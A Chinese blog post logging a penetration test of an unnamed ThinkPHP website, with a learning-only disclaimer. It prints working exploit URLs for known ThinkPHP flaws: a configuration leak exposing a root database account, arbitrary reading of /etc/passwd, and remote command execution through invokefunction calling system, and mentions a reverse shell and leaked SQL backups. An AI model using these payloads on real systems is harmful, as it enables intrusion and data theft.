记录日常测试(二)

记录日常测试(二)

请勿使用本文档提供的相关工具开展任何违法犯罪活动。本技术类文档与工具仅支持学习安全技术使用,他用造成严重后果,请自行负责!!!

测试接踵而至,根本停不下来

信息收集

打开这样一个网站,点一点,发现有这种传参,那必然要试一试sql注入

image-20240614235000729

加了一个单引号,thinkphp特征出来了

image-20240614235158313

之后,先是尝试了sql注入,发现没有漏洞

发现漏洞

好吧,我们直接进行漏洞测试,历史漏洞扫描一波

好家伙,盆满钵满

image-20240615010135942

一个一个试一试,发现数据库账号root,密码是空

/?s=index/think\config/get&name=database.username

image-20240615000527386

存在任意文件读取

/?s=index/\think\Lang/load&file=/etc/passwd

image-20240615000651862

命令执行试一试

/?s=index/\think\app/invokefunction&function=system&vars[0]=whoami&vars[1][]=-1

image-20240615001056580

后渗透

反弹shell,之后想写个webshell,结果发现www权限,不能写文件,醉了

image-20240615002945326

好吧权限没法提升,还是太菜

再转转

看了看84端口,是一个登录口,试了试弱口令啥的,都没有

image-20240615005307988

看了一下81端口

image-20240615005127948

好家伙,又是泄露,而且点一点,看一看,看到了sql备份

image-20240615005434153

各种数据,但是数据库里密码都是加盐的MD5加密,难搞

image-20240615005612547

  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值